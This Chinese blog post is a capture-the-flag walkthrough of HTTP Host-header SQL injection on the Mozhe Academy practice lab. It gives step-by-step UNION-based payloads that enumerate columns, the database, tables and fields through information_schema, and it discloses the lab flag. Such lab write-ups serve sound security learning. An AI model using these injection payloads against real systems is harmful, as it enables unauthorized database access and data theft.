www.xiahuhu.cn
关注网络安全

SQL注入之HTTP头注入–【SQL注入专题】

我有话要说:大锅本站部分分享的资源来自网络,如有侵权及其他事宜请点击联系我处理
之前突然对web安全有了有兴趣,想深入的学习下web安全相关的知识,所以在网上找了一个在线靶场(墨者学院)当练练手了,结果做着做着就停不下来了,积分一下子就刷到了第一,总共130几个靶场环境都基本上做完了,这里也把每个题的所涉及到的知识点分享出来。

背景介绍

安全工程师”墨者”最近在练习MySQL头部注入漏洞,自己刚搭建好一个靶场环境PHP+MySQL。尽情的练习SQL注入吧。

实训目标

  • 掌握SQL注入原理;
  • 了解手工注入的方法
  • 了解MySQL的数据结构;
  • 了解HTTP头部注入;

解题方向

HTTP头部(HOST注入)

解题思路

既然是host注入,首先抓包判断字段数:

1、判断字段数,http头host处输入:order by 4

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】
页面返回正常,输入order by 5,页面返回错误,说明字段数为4

SQL注入之HTTP头注入–【SQL注入专题】

2、判断显示位置

union select 1,2,3,4

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】

显示位置为2,3,4

3、判断当前数据库

union select 1,database(),3,4

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】当前数据库为pentesterlab

 

4、判断表

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='pentesterlab'  

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】得到表:comment,flag,goods,user

5、字段值

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='flag'   

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】
最后得到flag为:mozhe47f283

赞(0) 打赏
未经允许不得转载:花生米's Blog » SQL注入之HTTP头注入–【SQL注入专题】
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏